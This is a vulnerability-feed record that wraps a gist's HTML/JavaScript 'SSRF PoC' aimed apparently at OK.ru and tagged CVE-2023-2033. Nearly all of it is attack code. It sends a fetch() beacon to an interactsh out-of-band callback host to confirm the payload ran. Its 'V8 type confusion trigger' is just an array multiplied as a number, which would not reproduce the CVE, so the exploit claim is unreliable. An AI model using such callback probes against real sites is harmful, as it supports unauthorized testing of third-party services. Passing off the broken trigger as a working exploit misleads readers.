{"uuid": "73b429ff-d0e4-4030-aec1-c8ddf40f8736", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2033", "type": "seen", "source": "https://gist.github.com/asmirnovnik0789-svg/42fb2051c9c75ea7b4cc95c69d8ad2d6", "content": "\n\n\n OK.ru SSRF PoC\n\n\n \nSSRF POC - Chrome 111/112\n \n // \u041e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u043d\u0430\u0448 interactsh \u0447\u0435\u0440\u0435\u0437 fetch\n fetch('https://d8t3fcjs31i6fm7r4magrgnmcygqfumxh.oast.live/poc-loaded')\n .then(response => {\n console.log('SSRF POC sent to interactsh');\n })\n .catch(error => {\n console.log('Error:', error);\n });\n \n // \u041f\u044b\u0442\u0430\u0435\u043c\u0441\u044f \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u043e\u0448\u0438\u0431\u043a\u0443 \u0432 V8 (CVE-2023-2033)\n try {\n // \u041f\u0440\u043e\u0441\u0442\u043e\u0439 \u0442\u0440\u0438\u0433\u0433\u0435\u0440 \u0434\u043b\u044f type confusion\n var arr = [1.1, 2.2, 3.3];\n var obj = { x: 1 };\n \n for (var i = 0; i < 1000; i++) {\n if (i == 500) {\n // \u041c\u0435\u043d\u044f\u0435\u043c \u0442\u0438\u043f \u043e\u0431\u044a\u0435\u043a\u0442\u0430\n obj.x = arr;\n // \u041f\u044b\u0442\u0430\u0435\u043c\u0441\u044f \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u043a\u0430\u043a \u0447\u0438\u0441\u043b\u043e\n var val = obj.x * 2;\n }\n }\n console.log('V8 test passed');\n } catch(e) {\n // \u0415\u0441\u043b\u0438 V8 \u0443\u043f\u0430\u0434\u0435\u0442 - \u0445\u043e\u0440\u043e\u0448\u043e\n console.log('V8 error:', e.message);\n }\n \n\n", "creation_timestamp": "2026-06-23T08:02:46.000000Z"}